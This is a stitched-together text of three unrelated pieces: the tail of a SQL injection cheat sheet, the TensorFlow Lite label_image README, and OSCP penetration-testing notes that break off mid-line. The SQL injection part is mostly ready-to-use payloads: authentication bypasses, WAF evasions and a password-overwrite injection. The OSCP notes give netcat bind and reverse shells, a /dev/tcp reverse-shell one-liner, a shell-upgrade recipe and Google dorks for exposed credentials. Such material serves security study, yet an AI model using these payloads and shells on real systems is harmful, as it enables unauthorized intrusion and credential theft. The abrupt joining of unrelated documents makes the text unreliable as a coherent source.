non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) | |commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'| |commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'| |commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() | |concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'| |charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | |charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | |equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' | |escapequotes.py | Slash escape quotes (' and ") | |greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | |halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | |htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> &#39;) | |ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart| |ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'| |informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier | |least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart | |lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) | |modsecurityversioned.py | Embraces complete query with versioned comment | |modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | |multiplespaces.py | Adds multiple spaces around SQL keywords | |nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters| |overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | |overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) | |percentage.py | Adds a percentage sign ('%') infront of each character | |plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart | |plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart | |randomcase.py | Replaces each keyword character with random case value | |randomcomments.py | Add random comments to SQL keywords| |securesphere.py | Appends special crafted string | |sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | |space2comment.py | Replaces space character (' ') with comments | |space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | |space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | |space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | |space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | |space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | |space2plus.py | Replaces space character (' ') with plus ('+') | |space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | |unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | |unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | |uppercase.py | Replaces each keyword character with upper case value 'INSERT'| |varnish.py | Append a HTTP header 'X-originating-IP' | |versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | |versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| ## Authentication bypass ```sql '-' ' ' '&' '^' '*' ' or 1=1 limit 1 -- -+ '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' -- - admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` ## Authentication Bypass (Raw MD5) When a raw md5 is used, the pass will be queried as a simple string, not a hexstring. ```php "SELECT * FROM admin WHERE pass = '".md5($password,true)."'" ``` Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING` ```php md5("ffifdyop", true) = 'or'6�]��!r,��b ``` Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772) ## Polyglot injection (multicontext) ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` ## Routed injection ```sql admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' ``` ## Insert Statement - ON DUPLICATE KEY UPDATE ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by: ```sql Inject using payload: [email protected]", "bcrypt_hash_of_qwerty"), ("[email protected]", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- The query would look like this: INSERT INTO users (email, password) VALUES ("[email protected]", "bcrypt_hash_of_qwerty"), ("[email protected]", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input"); This query will insert a row for the user “[email protected]”. It will also insert a row for the user “[email protected]”. Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty". After this, we can simply authenticate with “[email protected]” and the password “qwerty”! ``` ## WAF Bypass No Space (%20) - bypass using whitespace alternatives ```sql ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- ?id=1%0Cand%0C1=1%0C-- ?id=1%0Band%0B1=1%0B-- ?id=1%0Aand%0A1=1%0A-- ?id=1%A0and%A01=1%A0-- ``` No Whitespace - bypass using comments ```sql ?id=1/*comment*/and/**/1=1/**/-- ``` No Whitespace - bypass using parenthesis ```sql ?id=(1)and(1)=(1)-- ``` No Comma - bypass using OFFSET, FROM and JOIN ```sql LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` No Equal - bypass using LIKE/NOT IN/IN ```sql ?id=1 and substring(version(),1,1)like(5) ?id=1 and substring(version(),1,1)not in(4,3) ?id=1 and substring(version(),1,1)in(4,3) ``` Blacklist using keywords - bypass using uppercase/lowercase ```sql ?id=1 AND 1=1# ?id=1 AnD 1=1# ?id=1 aNd 1=1# ``` Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || = -> LIKE,REGEXP, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` Information_schema.tables Alternative ```sql select * from mysql.innodb_table_stats; +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes | +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 | | dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 | ... +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ mysql> show tables in dvwa; +----------------+ | Tables_in_dvwa | +----------------+ | guestbook | | users | +----------------+ ``` Version Alternative ```sql mysql> select @@innodb_version; +------------------+ | @@innodb_version | +------------------+ | 5.6.31 | +------------------+ mysql> select @@version; +-------------------------+ | @@version | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ mysql> mysql> select version(); +-------------------------+ | version() | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ ``` ## References * Detect SQLi * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) * [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/) * MySQL: * [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) * [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) * [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/) * [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection) * MSSQL: * [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php) * [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * ORACLE: * [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet) * POSTGRESQL: * [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) * Others * [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) * [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) * [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) * [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) * [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) * [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet) * [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/) * [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html) * [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) * [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) * Second Order: * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/) * [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) * Sqlmap: * [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
# TensorFlow Lite C++ image classification demo This example shows how you can load a pre-trained and converted TensorFlow Lite model and use it to recognize objects in images. Before you begin, make sure you [have TensorFlow installed](https://www.tensorflow.org/install). You also need to [install Bazel](https://docs.bazel.build/versions/master/install.html) in order to build this example code. And be sure you have the Python `future` module installed: ``` pip install future --user ``` ## Build the example First run `$TENSORFLOW_ROOT/configure`. To build for Android, set Android NDK or configure NDK setting in `$TENSORFLOW_ROOT/WORKSPACE` first. Build it for desktop machines (tested on Ubuntu and OS X): ``` bazel build -c opt //tensorflow/lite/examples/label_image:label_image ``` Build it for Android ARMv8: ``` bazel build -c opt --config=android_arm64 \ //tensorflow/lite/examples/label_image:label_image ``` Build it for Android arm-v7a: ``` bazel build -c opt --config=android_arm \ //tensorflow/lite/examples/label_image:label_image ``` ## Download sample model and image You can use any compatible model, but the following MobileNet v1 model offers a good demonstration of a model trained to recognize 1,000 different objects. ``` # Get model curl https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_02_22/mobilenet_v1_1.0_224.tgz | tar xzv -C /tmp # Get labels curl https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_1.0_224_frozen.tgz | tar xzv -C /tmp mobilenet_v1_1.0_224/labels.txt mv /tmp/mobilenet_v1_1.0_224/labels.txt /tmp/ ``` ## Run the sample on a desktop ``` bazel-bin/tensorflow/lite/examples/label_image/label_image \ --tflite_model /tmp/mobilenet_v1_1.0_224.tflite \ --labels /tmp/labels.txt \ --image tensorflow/lite/examples/label_image/testdata/grace_hopper.bmp ``` You should see results like this: ``` Loaded model /tmp/mobilenet_v1_1.0_224.tflite resolved reporter invoked average time: 68.12 ms 0.860174: 653 653:military uniform 0.0481017: 907 907:Windsor tie 0.00786704: 466 466:bulletproof vest 0.00644932: 514 514:cornet, horn, trumpet, trump 0.00608029: 543 543:drumstick ``` ## Run the sample on an Android device Prepare data on devices, e.g., ``` adb push bazel-bin/tensorflow/lite/examples/label_image/label_image /data/local/tmp adb push /tmp/mobilenet_v1_1.0_224.tflite /data/local/tmp adb push tensorflow/lite/examples/label_image/testdata/grace_hopper.bmp /data/local/tmp adb push /tmp/labels.txt /data/local/tmp ``` Run it, ``` adb shell "/data/local/tmp/label_image \ -m /data/local/tmp/mobilenet_v1_1.0_224.tflite \ -i /data/local/tmp/grace_hopper.bmp \ -l /data/local/tmp/labels.txt" ``` then you should see something like the following: ``` Loaded model /data/local/tmp/mobilenet_v1_1.0_224.tflite resolved reporter INFO: Initialized TensorFlow Lite runtime. invoked average time: 25.03 ms 0.907071: 653 military uniform 0.0372416: 907 Windsor tie 0.00733753: 466 bulletproof vest 0.00592852: 458 bow tie 0.00414091: 514 cornet ``` Run the model with NNAPI delegate (`-a 1`), ``` adb shell "/data/local/tmp/label_image \ -m /data/local/tmp/mobilenet_v1_1.0_224.tflite \ -i /data/local/tmp/grace_hopper.bmp \ -l /data/local/tmp/labels.txt -a 1 -f 1" ``` then you should see something like the following: ``` Loaded model /data/local/tmp/mobilenet_v1_1.0_224.tflite resolved reporter INFO: Initialized TensorFlow Lite runtime. INFO: Created TensorFlow Lite delegate for NNAPI. Applied NNAPI delegate. invoked average time:10.348 ms 0.905401: 653 military uniform 0.0379589: 907 Windsor tie 0.00735866: 466 bulletproof vest 0.00605307: 458 bow tie 0.00422573: 514 cornet ``` To run a model with the Hexagon Delegate, assuming we have followed the [Hexagon Delegate Guide](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/g3doc/performance/hexagon_delegate.md) and installed Hexagon libraries in `/data/local/tmp`. Run it with (`-j 1`) ``` adb shell \ "/data/local/tmp/label_image \ -m /data/local/tmp/mobilenet_v1_1.0_224_quant.tflite \ -i /data/local/tmp/grace_hopper.bmp \ -l /data/local/tmp/labels.txt -j 1" ``` then you should see something like the followings: ``` Loaded model /data/local/tmp/mobilenet_v1_1.0_224_quant.tflite resolved reporter INFO: Initialized TensorFlow Lite runtime. loaded libcdsprpc.so INFO: Created TensorFlow Lite delegate for Hexagon. INFO: Hexagon delegate: 31 nodes delegated out of 31 nodes with 1 partitions. Applied Hexagon delegate. invoked average time: 4.231 ms 0.639216: 458 bow tie 0.329412: 653 military uniform 0.00784314: 835 suit 0.00784314: 611 jersey 0.00392157: 514 cornet ``` Run the model with the XNNPACK delegate (`-x 1`), ```shell adb shell \ "/data/local/tmp/label_image \ -m /data/local/tmp/mobilenet_v1_1.0_224.tflite \ -i /data/local/tmp/grace_hopper.bmp \ -l /data/local/tmp/labels.txt -x 1" ``` then you should see something like the following: ``` Loaded model /data/local/tmp/mobilenet_v1_1.0_224.tflite resolved reporter INFO: Initialized TensorFlow Lite runtime. Applied XNNPACK delegate. invoked average time: 17.33 ms 0.90707: 653 military uniform 0.0372418: 907 Windsor tie 0.0073376: 466 bulletproof vest 0.00592857: 458 bow tie 0.00414093: 514 cornet ``` With `-h` or any other unsupported flags, `label_image` will list supported options: ```shell sargo:/data/local/tmp $ ./label_image -h ./label_image: invalid option -- h label_image --accelerated, -a: [0|1], use Android NNAPI or not --old_accelerated, -d: [0|1], use old Android NNAPI delegate or not --allow_fp16, -f: [0|1], allow running fp32 models with fp16 or not --count, -c: loop interpreter->Invoke() for certain times --gl_backend, -g: [0|1]: use GL GPU Delegate on Android --hexagon_delegate, -j: [0|1]: use Hexagon Delegate on Android --input_mean, -b: input mean --input_std, -s: input standard deviation --image, -i: image_name.bmp --labels, -l: labels for the model --tflite_model, -m: model_name.tflite --profiling, -p: [0|1], profiling or not --num_results, -r: number of results to show --threads, -t: number of threads --verbose, -v: [0|1] print more information --warmup_runs, -w: number of warmup runs --xnnpack_delegate, -x [0:1]: xnnpack delegate` ``` See the `label_image.cc` source code for other command line options.
# Optixal's OSCP Notes > Try Harder # Welcome ## Finding Your Way Around Kali ### Find, Locate, and Which #### locate Reads from a database prepared by `updatedb` ```sh updatedb locate sdb.exe ``` #### which Returns pathnames of files or links which would be executed in the current environment. It does this by searching the PATH variable. `which sbd` #### find * `find / -name 'sbd*'` * `find / -name 'foldername' -type d` * `find / -name 'filename' -type f` * `find / -name 'sbd*' -exec file {} \;` ## Managing Kali Linux Services The standard Kali services include ssh, http, sql, which by default would load at boot time, however Kali prevents this by not allowing that, and includes a management system to control their status. Before starting any services, change root password with `passwd`. ### SSH Service Port 22 ```sh service ssh start netstat -tunap | grep sshd service ssh stop netstat -tunap | grep sshd ``` ### HTTP Service Port 80 `service apache2 start` Default Apache document root is at `/var/www/html` To change the index page, `echo "Kali Linux rocks" > /var/www/html/index.html` `service apache2 stop` ### Service Management `service` is a wrapper around existing system init scripts located in `/etc/init.d/` directory. Another way of managing the service, you can directly use the init scripts. * `/etc/init.d/ssh start` * `/etc/init.d/ssh stop` ### Service Boot Persistence Services will be started at boot time. * `update-rc.d ssh enable` or `systemctl enable ssh` * `update-rc.d ssh disable` or `systemctl disable ssh` For more granular control of these services, use `rcconf` or `sysv-rc-conf`, both to help simplify and manage the boot persistence of these services. ## The Bash Environment ### Intro to Bash Scripting #### 1.3.1.1 - Practical Bash Usage – Example 1 > Files: cisco.sh Find all of cisco.com's subdomains on their homepage and find their IPs. ##### Method 1 `curl -s https://www.cisco.com | grep 'href=' | cut -d'/' -f3 | grep 'cisco.com' | cut -d'"' -f1 | sort -u > test` * `curl https://www.cisco.com` - Download cisco.com and output to stdout, silent, hide progress * `grep 'href='` - Grep all lines with href links * `cut -d'/' -f3` - Splits lines by slashes and take field number 3 (eg. Field 3 of ...href="http://hello.cisco.com/"... will be hello.cisco.com) * `grep 'cisco.com'` - Filter out lines with cisco.com as the domain * `cut -d'"' -f1` - Filter out lines that have trailing quotes * `sort -u` - Sort and remove all duplicates with `-u` (unique). Compared to `uniq`, `uniq` removes duplicates that are adjacent to each other, eg. a a b a -> a b a ##### Method 2 `curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u` * `curl -s https://www.cisco.com` - Download cisco.com and output to stdout, silent, hide progress * `grep -o '[A-Za-z0-9\._-]*\.*cisco\.com'` * `-o` - Output only the matching pattern * `[A-Za-z0-9\._-]*` - Match 0 or more alphanumeric character, including ".", "_" and "-" * `\.` - URL dot * `*` - Non-regex, grep wildcard in this case, to match domains that end with cisco.com (eg. static-static.com) * `\.com` - URL top level domain * `sort -u` - Sort and remove all duplicates with `-u` (unique) ##### Other Methods * `curl https://www.cisco.com | grep -o -P '[\w\._-]+\.[\w\._-]*cisco\.com' | sort -u` - Equivalent to method 2 * `curl https://www.cisco.com | grep -o -E '\w+\.cisco\.com' | sort -u ` - Shortcut, less accurate as it doesn't match "www.static-cisco.com" * `wget -q -O - https://www.cisco.com | ...` - Wget instead of curl, quiet, and output to stdout ##### Final `for url in $(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u); do host $url | grep 'has address' | cut -d' ' -f4; done` #### 1.3.1.2 - Practical Bash Usage – Example 2 ```sh cat access_log.txt | cut -d' ' -f1 | sort | uniq -c | sort -urn | head cat access_log.txt | grep '208.68.234.99' | cut -d'"' -f2 | sort | uniq -c | sort -urn | head cat access_log.txt | grep '208.68.234.99' | grep '/admin' | sort | uniq -c # cat access_log.txt | grep '208.68.234.99' | grep '/admin' | awk '{print $9}' | sort | uniq -c ``` ### Data Manipulation Tools Summary #### `cut` * `-d` - Delimiter * `-f` - Field number * `-f4` - Field 4 * `-f1,4` - Field 1 and 4 * `-f2-5` - Fields 2 to 5 * `-f-7` - Fields 1 to 7 * `-f3-` - Fields 3 and beyond #### `sort` and `uniq` * `sort -u` - Sort and remove all duplicates (unique) * `uniq` - Remove duplicates adjacent to each other * `uniq -c` - Remove duplicates adjacent to each other and count * `uniq -u` - Show unique items only (rarely use) * `sort | uniq -c | sort -urn` - Count occurence and sort them from most common to least #### `grep` * `grep [pattern]` - Print lines only with matching pattern, can handle regular regex, no `+`, no shorthands, `*` on its own means grep wildcard * `grep -arni [pattern]` - Process binaries as text, recursive, line prefixed, ignore case * `grep -arni [pattern] --include \*.md` - Process binaries as text, recursive, line prefixed, ignore case, and only from markdown files * `grep -E [pattern]` - Extended regex, `+`, shorthands, but cannot put shorthands in brackets * `grep -P [pattern]` - Perl/Python regex, `+`, shorthands, can put shorthands in brackets Windows counterpart of `grep` is `find`, eg. `netstat -na | find "4444"` #### `tr` * `medusa -d | grep \+ | cut -d' ' -f6 | cut -d. -f1 | tr '\n' ' '` - Translates/substitutes all line breaks with commas, converting multiple lines into a single line separated with spaces #### `for` ```sh IFS=$'\n' # if the list file has spaces, the for loop will split it, so you shud use internal field separator for ip in $(cat list); do echo "$ip" done ``` # The Essential Tools ## Netcat/`nc` ### Connecting to a TCP/UDP Port `nc -nv [ip] [port]` - `-n` means do no resolve hostname, `-v` more verbose Start Mercury mail server on Win 7 machine. * 25 - SMTP * 110 - POP3 * 143 - IMAP ```sh ➜ lab-connection nc -nv 192.168.1.23 25 (UNKNOWN) [192.168.1.23] 25 (smtp) open 220 localhost ESMTP server ready. HELP 214-Recognized SMTP commands are: 214- HELO EHLO MAIL RCPT DATA RSET 214- AUTH NOOP QUIT HELP VRFY SOML 214 Mail server account is 'Maiser'. ^C ➜ lab-connection nc -nv 192.168.1.23 110 (UNKNOWN) [192.168.1.23] 110 (pop3) open +OK <87219363.8932@localhost>, POP3 server ready. ^C ➜ lab-connection nc -nv 192.168.1.23 110 (UNKNOWN) [192.168.1.23] 110 (pop3) open +OK <87253870.12354@localhost>, POP3 server ready. USER bob +OK bob is known here. PASS bob -ERR Username or password is invalid or incorrect. QUIT +OK localhost Server closing down. ➜ lab-connection nc -nv 192.168.1.23 143 (UNKNOWN) [192.168.1.23] 143 (imap2) open * OK localhost IMAP4rev1 Mercury/32 v4.52 server ready. ^C ➜ lab-connection ``` ### Listening on a TCP/UDP Port On Win 7, move nc.exe to C:\Windows. ```sh # Win 7 C:\Users\Offsec>nc -nlvp 4444 listening on [any] 4444 connect to [192.168.1.23] from <UNKNOWN> [192.168.1.23] 59460 hi ``` ```sh # Kali ➜ lab-connection nc -nv 192.168.1.23 4444 (UNKNOWN) [192.168.1.23] 4444 (?) open hi ``` Win 7 is the server, `-nlvp 4444` no lookup listening (server) verbose bound to port 4444. Kali is the client connecting to it on port 4444 with `-nv`. ### Transferring Files with Netcat ```sh # Win 7 nc -nlvp 446 > incoming.exe ``` ```sh # Kali ➜ lab-connection nc -nv 192.168.1.23 4446 < /usr/share/windows-binaries/wget.exe (UNKNOWN) [192.168.1.23] 4446 (?) open ➜ lab-connection ``` ```sh # Win 7 incoming.exe -h ``` ### Remote Administration with Netcat #### 2.1.4.1 - Netcat Bind Shell Scenario Alice -> Firewall -> Public IP -> Internet -> Public IP -> Bob ```sh # Win 7 nc -lvp 4446 -e cmd.exe ``` ```sh # Kali nc -nv 192.168.1.23 4446 C:\Users\Offsec>ipconfig ... ``` #### 2.1.4.2 - Reverse Shell Scenario ```sh # Win 7 nc -nlvp 4446 ``` ```sh # Kali nc -nv 192.168.1.23 4446 -e /bin/bash ``` ```sh # Win 7 whoami root ``` #### Netcat as a Port Monitor ```sh watch -n1 nc -w1 -nvz 192.168.1.23 123 # -w1: timeout 1 sec, -n: no reverse lookup, -v: verbose, -z: no IO, act as a scanner ``` ## `ncat` Reverse Shell ```sh # Kali ncat -lnvp 4444 --allow [win ip] --ssl # Win ncat -nv [kali ip] 4444 -e cmd.exe --ssl ``` Bind Shell ```sh # Win ncat -lnvp 4444 -e cmd.exe --allow [kali ip] --ssl # Kali ncat -nv [win ip] 4444 --ssl ``` The `ncat` in the Windows VM produces many errors, even after updating. To update, download "nmap-7.60-win32.zip" and reinstall the nmap suite, which includes the latest version of ncat. Be warned, errors will still occur. ## Shells Reference Upgrade a half shell to full interactive shell on a compromised Linux machine: ```sh # On victim python -c 'import pty;pty.spawn("/bin/bash")' Ctrl-z # On attacker echo $TERM # note down stty -a # note down rows and cols stty raw -echo # this may be enough fg # On victim reset export SHELL=bash export TERM=xterm256-color stty rows 38 columns 116 ``` Resources: * Upgrade to full interactive shell: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ * Reverse Shell Cheatsheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet * `bash -i >& /dev/tcp/10.0.0.1/8080 0>&1` Note: Netcat (`nc`) OpenBSD does not support `-e`. Netcat versions: GNU, OpenBSD, Traditional, Netcat6 ## Wireshark Network -> Capture Filters -> Capture Engine -> Display Filters Capture filters are very useful as they can selectively capture packets that match a certain criteria. The capture filter syntax is different from the usual display filter syntax. An example would be `host 8.8.8.8 and tcp port 80`, to capture packets that involve 8.8.8.8 and tcp port 80 only. Display filters on the other hand does not affect the packet capturing process, it just applies a filter to already captured packets, example `tcp.port == 80`. If you notice, wireshark capture filters are the same as tcpdump capture filters. Capture filters can be specified in Capture > Options > Capture filter for selected interface, or in Capture > Capture Filters Follow TCP stream is very useful as in can display the client and server communication in formatted plaintext. It works on web traffic, nc connections (shells, mail, unencrypted connections), etc. Typical web connection traffic: 1. ARP broadcast looking for the default gateway 2. ARP unicast reply providing the MAC address of the gateway 3. DNS A (IPv4) forward lookup query 4. DNS AAAA (IPv6) forward lookup query 5. DNS A response received 6. DNS AAAA response received 7. 3-way handshake on port 80 8. Initial protocol negotiation in HTTP GET request ## `tcpdump` ```sh tcpdump -r password_cracking_filtered.pcap | awk '{print $3}' | cut -d. -f-4 | sort | uniq -c | sort -urn # Show most common IPs tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap # Filter by src host tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap # Filter by dst host tcpdump -n port 81 -r password_cracking_filtered.pcap # Filter by port tcpdump -nXr password_cracking_filtered.pcap # Hex ``` Near the bottom of password_cracking_filtered.pcap, after many 401 Authorization Required bad attempts, a 301 occurs after using the following credentials: ``` GET //admin HTTP/1.1 Host: admin.conglomerate.com:81 User-Agent: Teh Forest Lobster Authorization: Basic YWRtaW46bmFub3RlY2hub2xvZ3kx Credentials: admin:nanotechnology1 ``` ### TCP Flags 14th byte of the TCP header ``` CEUAPRSF WCRCSSYI REGKHTNN ``` Apparently, HTTP requests and responses have TCP flags PSH and ACK enabled. To calculate ACK and PSH flags in decimal to use in tcpdump filter: ``` CEUAPRSF 00011000 = 24 in decimal ``` Online reference: http://rapid.web.unc.edu/resources/tcp-flag-key/ Finally, to filter out the HTTP packets, execute the following command, specifying that the 14th byte in the packets displayed should have ACK/PSH flags set: `tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap` # Passive Info Gathering ## Open Web Information Gathering ### Google Hacking * `filetype` * `inurl` * `intitle` * `intext` Powerpoint files with the phrase "penetration testing" in it, from microsoft.com `site:microsoft.com filetype:ppt "penetration testing"` VNC Viewer `intitle:"VNC viewer for Java"` Mobotix IPcam (admin creds - admin:meinsm) `inurl:"/control/userimage.html"` phpMyAdmin No Authentication Databases `inurl:.php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin` N3tShell Compromised Websites `intitle:"-N3t" filetype:php undetectable` Default Pages of Devices `intitle:"NetBotz Applicance" "OK" -filetype:pdf` Hardware with Known Vulnerabilities `intitle:"SpeedStream Router Management Interface"` Web Accessible, Open Cisco Routers `inurl:"level/15/exec/-/show"` Exposed Frontpage Credentials `"# -FrontPage-" filetype:pwd inurl:(service | authors | administrators | users)` ## Email Harvesting `theharvester -d cisco.com -b google` ## Additional Resources ### Netcraft https://www.netcraft.com/ Find all subdomains `*.cisco.com` ### Whois ```sh whois cisco.com whois 8.8.8.8 ``` ## Recon-ng ```sh recon-ng use recon/domains-contacts/whois_pocs # 